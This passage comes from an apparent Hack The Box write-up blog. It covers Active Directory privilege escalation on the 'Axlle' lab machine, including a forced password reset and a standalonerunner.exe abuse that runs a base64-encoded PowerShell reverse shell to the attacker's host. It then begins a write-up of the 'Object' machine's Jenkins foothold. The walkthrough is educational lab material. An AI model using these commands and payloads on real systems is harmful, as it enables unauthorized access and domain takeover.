'dallon.matrix' -p 'PJsO1du$CVJ#D' -d axlle.htb -dc mainframe.axlle.htb -c all -ns 10.10.11.21 INFO: Found AD domain: axlle.htb INFO: Getting TGT for user INFO: Connecting to LDAP server: mainframe.axlle.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: mainframe.axlle.htb INFO: Found 22 users INFO: Found 58 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: MAINFRAME.axlle.htb INFO: Done in 00M 10S</code></pre></div> <p>After uploading the data into BloodHound and marking the <code class="language-text">dallon.matrix</code> user as owned, viewing Shortest Path from Owned Principals showed that <code class="language-text">dallon.matrix</code> was a member of the <code class="language-text">Web Devs</code> group which had ForceChangePassword rights over <code class="language-text">baz.humphries</code>, who had PSRemote access to <code class="language-text">mainframe.axlle.htb</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/41b04a2ad27fd2bf3c1dca9193df0774/44507/shortest-path-from-owned-principals.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 97.46835443037975%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAA7DAAAOwwHHb6hkAAABrUlEQVR42qVUSXLCQAz0X7ikAgFj4wXvO2Yze3LJKf//Q0cSDAUcWMxhCjGWWi2pNVrfjvDofFkRumaMZ3y1Rw4M5CYWFrsO+tYbgAMnJmYhgnxBYAf8/v0gLJaww1LuWzHkQDssYIUVivk3eqMAfSduX3JULmF6OYbjlAA36BLgwHmxZC710/CQzzaIq0Zsw8uQTdfCcPBKDwXM9OFnMySThgbiyz0z5P9S8rOADNYzA3hJjUlzOLE5DkYA69UVINs9SiiHfNSgNNX8ruHDzkoU273IQwXzN8NLJYkK4uRWVMGngY29BCOydTc5ArKTS6xS6le22iJd7xEVC7qbCIBiWN0Acn+5z2ExJ2nNYZAPf9eUAwcNKYscslVGASQ7qpZnQGZv+rn8cp/5XJV8qbsvtm+Ey+BOXJ0ZB8TKOgmcyVxKSXtmPznIjkqRUEDtKBe7swJe3mUFyCXyI8Fgai3fAuSVS+s13HgiG9P6tVFDCOmRyGdbKXtwZ58fAupOig/XQufQgz5ipi2fL+4R9431lkwb+MsacdmQ5mbtGXIgS0YXfZJOx8ldMAb8B4+/dSEwhvrEAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Shortest Path from Owned Principals" title="" src="/static/41b04a2ad27fd2bf3c1dca9193df0774/50637/shortest-path-from-owned-principals.png" srcset="/static/41b04a2ad27fd2bf3c1dca9193df0774/dda05/shortest-path-from-owned-principals.png 158w, /static/41b04a2ad27fd2bf3c1dca9193df0774/679a3/shortest-path-from-owned-principals.png 315w, /static/41b04a2ad27fd2bf3c1dca9193df0774/50637/shortest-path-from-owned-principals.png 630w, /static/41b04a2ad27fd2bf3c1dca9193df0774/44507/shortest-path-from-owned-principals.png 750w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To change the user's password, I downloaded <a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1" target="_blank">PowerView</a> onto the target:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\programdata> wget 10.10.14.35:8000/PowerView.ps1 -o PowerView.ps1 wget 10.10.14.35:8000/PowerView.ps1 -o PowerView.ps1 PS C:\programdata> ls ls Directory: C:\programdata Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 6/13/2024 1:38 AM Microsoft d----- 6/13/2024 1:27 AM Package Cache d----- 12/31/2023 10:02 PM Packages d----- 6/13/2024 1:46 AM regid.1991-06.com.microsoft d----- 5/8/2021 1:20 AM SoftwareDistribution d----- 5/8/2021 2:36 AM ssh d----- 12/31/2023 9:38 PM USOPrivate d----- 5/8/2021 1:20 AM USOShared d----- 1/22/2023 1:36 AM VMware -a---- 12/12/2024 11:00 AM 904779 PowerView.ps1 -a---- 12/12/2024 10:18 AM 7168 shell.exe</code></pre></div> <p>I set a new password with <code class="language-text">Set-DomainUserPassword</code> from PowerView:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\programdata> . .\PowerView.ps1 . .\PowerView.ps1 PS C:\programdata> $password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force $password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force PS C:\programdata> Set-DomainUserPassword -Identity baz.humphries -AccountPassword $password Set-DomainUserPassword -Identity baz.humphries -AccountPassword $password</code></pre></div> <p>Then, I was able to log in over WinRM:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Axlle] └─$ evil-winrm -i 10.10.11.21 -u 'baz.humphries' -p 'P@ssw0rd' Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\baz.humphries\Documents> whoami axlle\baz.humphries</code></pre></div> <p><code class="language-text">baz.humphries</code> was a member of <code class="language-text">App Devs</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Users\baz.humphries\Documents> whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes =========================================== ================ ============================================= ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group AXLLE\App Devs Group S-1-5-21-1005535646-190407494-3473065389-1108 Mandatory group, Enabled by default, Enabled group AXLLE\Employees Group S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448</code></pre></div> <p>As a member of <code class="language-text">App Devs</code>, the user had access to <code class="language-text">C:\App Development</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\App Development> ls Directory: C:\App Development Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 1/1/2024 10:03 PM kbfiltr *Evil-WinRM* PS C:\App Development> cd kbfiltr *Evil-WinRM* PS C:\App Development\kbfiltr> ls Directory: C:\App Development\kbfiltr Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 1/1/2024 10:03 PM exe d----- 1/1/2024 10:03 PM sys -a---- 12/14/2023 11:39 AM 2528 kbfiltr.sln -a---- 6/11/2024 11:16 PM 2805 README.md</code></pre></div> <p><code class="language-text">README.md</code> contained the following note mentioning the automated running of <code class="language-text">standalonerunner.exe</code> as SYSTEM:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\App Development\kbfiltr> cat README.md &lt;...snip...> **NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment** &lt;...snip...></code></pre></div> <p>A web search led to <a href="https://github.com/nasbench/Misc-Research/blob/main/LOLBINs/StandaloneRunner.md" target="_blank">this</a> writeup which details how to get arbitrary command execution via <code class="language-text">standalonerunner.exe</code>. So based on the writeup, I took the following steps:</p> <p>I went to the execution directory. In this case, it was:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\</code></pre></div> <p>From there, I created a new directory, <code class="language-text">test</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> mkdir "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\test" Directory: C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64 Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 12/12/2024 12:11 PM test</code></pre></div> <p>In the <code class="language-text">test</code> directory, I created another directory, <code class="language-text">working</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> mkdir "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\test\working" Directory: C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\test Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 12/12/2024 12:11 PM working</code></pre></div> <p>In <code class="language-text">working</code>, I created a file called <code class="language-text">rsf.rsf</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> echo "" > "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\test\working\rsf.rsf"</code></pre></div> <p>Back in the execution directory, I created a file called <code class="language-text">reboot.rsf</code> with the following content:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">test True</code></pre></div> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> echo "test`nTrue" > reboot.rsf</code></pre></div> <p>And lastly, in the execution directory, I created a file called <code class="language-text">command.txt</code> that contained a reverse shell command:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> echo "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwA1ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" > command.txt</code></pre></div> <p>The structure should end up looking like this:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> tree . /f Folder PATH listing Volume serial number is 00000140 BFF7:F940 C:\PROGRAM FILES (X86)\WINDOWS KITS\10\TESTING\STANDALONETESTING\INTERNAL\X64 ¦ command.txt ¦ reboot.rsf ¦ standalonerunner.exe ¦ standalonexml.dll ¦ +---test +---working rsf.rsf</code></pre></div> <p>After about a minute, <code class="language-text">nc</code> caught a shell as <code class="language-text">administrator</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Axlle] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.35] from (UNKNOWN) [10.10.11.21] 52795 PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\test\working> whoami axlle\administrator PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\test\working> cd \users\administrator\desktop PS C:\users\administrator\desktop> ls Directory: C:\users\administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/12/2024 8:59 AM 34 root.txt</code></pre></div>https://mgarrity.com/hack-the-box-object/https://mgarrity.com/hack-the-box-object/Sat, 07 Dec 2024 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2bda46f010c8d91061978b897a106616/3b67f/object.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA9ElEQVR42mMQkdX+jwuLArGQnM5/Hjnd/0JQvggBzIDPMF6gQVIyGv81xZT+S0hr/ucD8kXJMRCkiR/oMgtx5f9VgtL/Z8uq/68RkvlvBOSDxEVJNRDkTWkZzf81QMPWNQf933c29/+GjtD/tUBDxWQ1SXMhyHY+eV2wN2fIa/zfczX9/5wPzv8P38n/P1NJ77+qmOJ/AXncXsftQmCYVYrJ/N88M+L/hSsl/3csiP1fKQJ0oYwW6WEoBnIlMAJMJJT+l/NK/Z8iofG/hE/6v76ECsGIwRvLIM2SwLDUAHpTVIaCWEa4FOQ9nf+C0DATIyIdAgDi2QXJ3+1VswAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Object" title="" src="/static/2bda46f010c8d91061978b897a106616/50637/object.png" srcset="/static/2bda46f010c8d91061978b897a106616/dda05/object.png 158w, /static/2bda46f010c8d91061978b897a106616/679a3/object.png 315w, /static/2bda46f010c8d91061978b897a106616/50637/object.png 630w, /static/2bda46f010c8d91061978b897a106616/fddb0/object.png 945w, /static/2bda46f010c8d91061978b897a106616/3b67f/object.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Object is a Windows machine running Active Directory. Access to a Jenkins instance allows for triggering builds that execute batch commands. By leveraging this access, Jenkins secrets can be retrieved and decrypted, yielding WinRM credentials for the user <code class="language-text">oliver</code>. Once a shell is obtained, it is discovered that <code class="language-text">oliver</code> is a domain user and the machine is a domain controller. Enumeration with BloodHound reveals that domain compromise can be achieved in three steps. First, <code class="language-text">oliver</code> has ForceChangePassword over <code class="language-text">smith</code>, enabling access as <code class="language-text">smith</code> by changing the user's password. Next, <code class="language-text">smith</code> has GenericWrite over <code class="language-text">maria</code>, enabling access as <code class="language-text">maria</code> by editing their logon script. Finally, <code class="language-text">maria</code> has WriteOwner over the <code class="language-text">Domain Admins</code> group, allowing the user to take ownership of the group and then be added as a member.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Object] └─$ nmap -sC -sV -oA nmap/output 10.10.11.132 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-03 20:24 EST Nmap scan report for object.htb (10.10.11.132) Host is up (0.042s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Mega Engines |_http-server-header: Microsoft-IIS/10.0 8080/tcp open http Jetty 9.4.43.v20210629 |_http-server-header: Jetty(9.4.43.v20210629) | http-robots.txt: 1 disallowed entry |_/ |_http-title: Site doesn't have a title (text/html;charset=utf-8). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds</code></pre></div> <p>I visited the webpage on port 80 which had a link to an automation server:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3bdae01e63ff4e08f473e2350b781f23/8739e/mega-engines-webpage.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 81.64556962025317%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC9ElEQVR42lWU2XLTQBBF9TXkJU5RcUK8xbIla9dIo9VanI3EhABVVPEAqeIf4JMv3S0TyMNYsqbnzO3bM22Mjk4wHo0xGU+wmFxitVjDNm1YpoW+7fHp42fs7/d43D/i6fEJVV5hTXP2ypbYS1ozGU+FMToawRifnGF6NsNyZmK9tLBZb+BuXHiOC51q7PoduralZ0/PDjpJ4bmuxHDs+pKg0yWm5zOcEcvgHWJfIVUaWZqhKkrUVY22adG2DZpmK2Pb1PLsuhbbupaYIi9QZiWtyxH5MRYXCxjmfCU7eY6HMAihVAytU+QFweuCQBW27WE0pXwraI5jlFJQsULohcLgLA2WvLE28F0fURQhTROC6QFGkLav0e22MpqOlLUDlDfk2CgMyQIPjsXpWzDs1UEdTaSpksB6W6K/2uLhww43972M2wd+3+HqppNNOEagiUJEmTHDomIajuXA93zEB3VllaOi4Pv9Dr9//cTXb3vcPFyhv2lhrpaIkxBXtx3F/FPJawNiOLZDQPoJfALGMVJN6eaULnl1fdfh+49H3D10aPoK3XUNlYZYLGboSD3bwdYIMCagH4DFiUKm88ehGFp257Qc10KiI8znU0wu3iHJYsQEvX7fi59FORTnFZCr85IyTXLKZT0M01yKmvl8hrcnJ5KuLhL0141sWpT565Q3zn9FORwZVqizhNTZOD8/QxBR9VUo/zOai2Ifz89fsKONWICiooRBIJVmlsG3w7Hd4diEQ2GyLBXoxrElNfZrOpnA813U5O89VbuqCoFFLwVx5dYYfBi53PxhKM4BSsUJQh8FWZCXmhRuEEYBWVIgSRIaakiVvHNpLTPkYPMd5NvyF8p+8mFVVPVMazGdFbNfeZ4JKKEbwjH+4ahwo2AGswy+0PyynA1Q9oGD2FeffGHV7C8rkeEFMscVZRB3JXNuCoMbjXFMLeeUWs/FoX2FbgQVJkhjjTIvUWR0gHUu7zk1AU1NhAfPR14kay5OJ8I4fjPCH4+eWcweciRUAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Mega Engines webpage" title="" src="/static/3bdae01e63ff4e08f473e2350b781f23/50637/mega-engines-webpage.png" srcset="/static/3bdae01e63ff4e08f473e2350b781f23/dda05/mega-engines-webpage.png 158w, /static/3bdae01e63ff4e08f473e2350b781f23/679a3/mega-engines-webpage.png 315w, /static/3bdae01e63ff4e08f473e2350b781f23/50637/mega-engines-webpage.png 630w, /static/3bdae01e63ff4e08f473e2350b781f23/8739e/mega-engines-webpage.png 878w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The link above redirected to <code class="language-text">object.htb:8080</code>, so I added <code class="language-text">object.htb</code> to <code class="language-text">/etc/hosts</code> and visited the page which was a Jenkins instance:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c40f519c8c0ab810b7014d91685e360d/8739e/jenkins-instance.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 81.64556962025317%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAABHElEQVR42q2UvU7DMBSF+5qwIx6AgR0GBjogkJBg64rYqlRiygILDLRdYCpNgEIqsCjYceK/g2MCFQiEcbB05Di++nKPleMWPIYxBkZrn1K04EecqxnwDfCQ3YJMbz69C+5QMI5uew3R1jrKFzrvONiyPbud9jZ2NzZhpGgGLIoCnHNQlmNGqXuWUoZbJoQgSRJMswx39xlGVynI03MYsPpVyrL8UM4FqBXjIgworLUZZWB5gVIqJ1HPUqmwDqGlndX3e75AXRfHFxMs7sdY6hxj9fAMKwenWO6cYGEvRnw5cTVKm9+B7x9PHymi4TV6gwRHwzF65yNE/TG6g9Tt/dSpR/SqyNkcO+sNomdq+5VcjL+sm10Ofxj/DnwFyqvlxnfNt4cAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Jenkins instance" title="" src="/static/c40f519c8c0ab810b7014d91685e360d/50637/jenkins-instance.png" srcset="/static/c40f519c8c0ab810b7014d91685e360d/dda05/jenkins-instance.png 158w, /static/c40f519c8c0ab810b7014d91685e360d/679a3/jenkins-instance.png 315w, /static/c40f519c8c0ab810b7014d91685e360d/50637/jenkins-instance.png 630w, /static/c40f519c8c0ab810b7014d91685e360d/8739e/jenkins-instance.png 878w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I created an account and logged in:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a7c3c926d8546b73f2ccc72804ad8c75/cfb3a/log-in-to-jenkins.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.06329113924051%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABW0lEQVR42qWS0U7CMBSGy2A8AOENjLdi9K3whifUIXNZCAPCBYEwosZgRGBlW7extdvv1kSiRBMzT/Knzek5f7+0h1ycn+Gy1cLV1TWazSaUSgWqqqJWq6FarUJRFLknhKDT6WAwsKDrOkzThGEYGI1GaLdvUK+raDQaIIZhoqc/YDgc4r7Xg6Z1oXW7uL3T0O/3MZlMZJNlWZhOp1gsFrBtG8vl8qgiX9SMx2OQNPERBj44F/gaQghEUYQ4jpGmKf4aZE/XcHZbZFkmE59rGIaYz+eYzWZwHAdJkiCIYvhRAi7SolDWnoowj2K33YKx4NtNxWFByTmXlPHhgCjm8HJDkWa/E3qegz2lkuDUsEyQ1/UGTy8rOK4PL4jgshDUYzldWs6QBQHo3oXns/xtxFGlCVdv77Afn6XWGyenPIC6/yB0fR9BmI9HwqWSfHwKlSYU+S/+NGdlDT8AkJQus2gEeeYAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="log in to Jenkins" title="" src="/static/a7c3c926d8546b73f2ccc72804ad8c75/50637/log-in-to-jenkins.png" srcset="/static/a7c3c926d8546b73f2ccc72804ad8c75/dda05/log-in-to-jenkins.png 158w, /static/a7c3c926d8546b73f2ccc72804ad8c75/679a3/log-in-to-jenkins.png 315w, /static/a7c3c926d8546b73f2ccc72804ad8c75/50637/log-in-to-jenkins.png 630w, /static/a7c3c926d8546b73f2ccc72804ad8c75/fddb0/log-in-to-jenkins.png 945w, /static/a7c3c926d8546b73f2ccc72804ad8c75/cfb3a/log-in-to-jenkins.png 979w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Attempting to access the script console at <code class="language-text">/script</code> resulted in access denied:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4387952785baf67a4d0d629a43e0a698/cfb3a/script-console-access-denied.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.11392405063291%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAy0lEQVR42o2PsQ6CMBCGyyATIyOPICY+Ak/MpM4WCCQ6EByQdvAJCDhojLb9rVUIRole8uW/a+7+3pH5zMfU9+F5HgghH1iWZdR1XYRhCBpFhjiODZRSBEEA257AcRyQxXKFtX7MsgyRbuxIkuSNNE1RVRUYY+Cc9zDGsdls+w8IRkIqBaWRHVKa+lcQ9WoecrtecShL7IsCbLdDmefgOr+0LeTpBHE+G/OO4ezXDZUQEHUNeTxCNs1TdS10fnuoNsbItt8N/zht7OQ7W3Ch/yNdwawAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Script Console access denied" title="" src="/static/4387952785baf67a4d0d629a43e0a698/50637/script-console-access-denied.png" srcset="/static/4387952785baf67a4d0d629a43e0a698/dda05/script-console-access-denied.png 158w, /static/4387952785baf67a4d0d629a43e0a698/679a3/script-console-access-denied.png 315w, /static/4387952785baf67a4d0d629a43e0a698/50637/script-console-access-denied.png 630w, /static/4387952785baf67a4d0d629a43e0a698/fddb0/script-console-access-denied.png 945w, /static/4387952785baf67a4d0d629a43e0a698/cfb3a/script-console-access-denied.png 979w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>On the Dashboard page, the user had access to create jobs:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c7214f9d6fca4d0cdef6e10c2cf828e8/cfb3a/create-a-job.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.69620253164557%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABtElEQVR42p2S227aQBCG94Y7JEA8AG/Q3kaozUMlF7wiISQEcQxOzKEg4QNee+3FgNf+O+uGNEZVFWWkT3vQzPz/esyuvn/Dj2YTP6+v0Wg0UC6XUa1WUalU3qnVaiiVSmi1Wuj1emi32+h2u+h0OhgMBri5uUW9Xs/rWffhEXd39xiNRphOpxiPxwX0/ZnZbAbTNDGfzwsYhoHJZJLD0mMAGQkkicLHyDRZhsvQd/+6PwfzuQXPc5GmWSE5jmP0+/135y/kYjgcov/0BMuyKD/F6XSCUorMJMjorGuZDDl2OxdRFBWUFCVYjoOtbcPd7WDTXp8tOjsu5cs9ISH3+xwtkDsUgoNzjoTUCg1JVVChT018x0bkefkqqDknh4peQPZA9t6gemrKNpaDxWoNLwgRyBh+KMGJYyCwMF5gTJ6xfDWxWf7CerHKWZkLeLYLwX0EHs/hjotECDD9VN8PEIgQif4eGv09DkfEVCDJWRJJJGH0Z6V8ReuJ8rXomQPlpuSabbY2XknVJAeW60GQS05ulUovZv5h/78ph6QYHw5/3b2RT/yi1WeC6bGfJ3T5v30lfgMvYihMF1N+xgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Create a job" title="" src="/static/c7214f9d6fca4d0cdef6e10c2cf828e8/50637/create-a-job.png" srcset="/static/c7214f9d6fca4d0cdef6e10c2cf828e8/dda05/create-a-job.png 158w, 